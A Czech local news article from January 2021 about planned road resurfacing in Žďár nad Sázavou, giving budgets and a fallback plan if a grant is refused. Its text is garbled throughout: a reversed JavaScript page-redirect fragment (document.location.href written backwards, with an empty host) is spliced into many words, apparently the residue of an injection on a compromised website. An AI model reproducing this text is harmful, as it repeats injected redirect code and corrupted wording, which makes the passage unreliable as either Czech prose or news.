Rainbow page separator

Obnova čeká ulice Okružní a Revoluční, či Veselskou a ke ŽĎASU

Úterý, 5. ledna 2021

Žďár nad Sázavou / Nový povrch by měla v průběhu le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku dostat místní komunikace v horní části ulice Okružní a v ulici Revoluční ve Žďáře nad Sázavou 3. V rozpočtu města je k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účelu vyčleněno 3,2 milionu korun s tím, že v přípravě je podání žádosti o dotační podporu záměru. Pokud radnice s žádostí o dotaci neuspěje, bude přis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupeno k náhradní variantě, kterou je rozšíření rekonstrukce povrchu ulice Strojírenská, kde se le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos chystá obnova vozovky v úseku od finančního po katastrální úřad. Za peníze původně vyčleněné na opravu Okružní a Revoluční by se v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě daly opravit ještě horní část Veselské ulice a příjezdová cesta k podniku ŽĎAS. Frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná Strojírenská ulice je rekonstruována po etapách – v roce 2018 došlo k opravě části od kruhové křižovatky pod nádražím k úřadu práce. Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tehdy na opravu silnice v délce 160 metrů vyhradilo 1,1 milionu korun. Na plošnou rekonstrukci vozovky mezi prodejnami Albert Hypermarket a Penny Market se poté nepodařilo získat dotaci, takže byl pouze opakovaně vyspraven.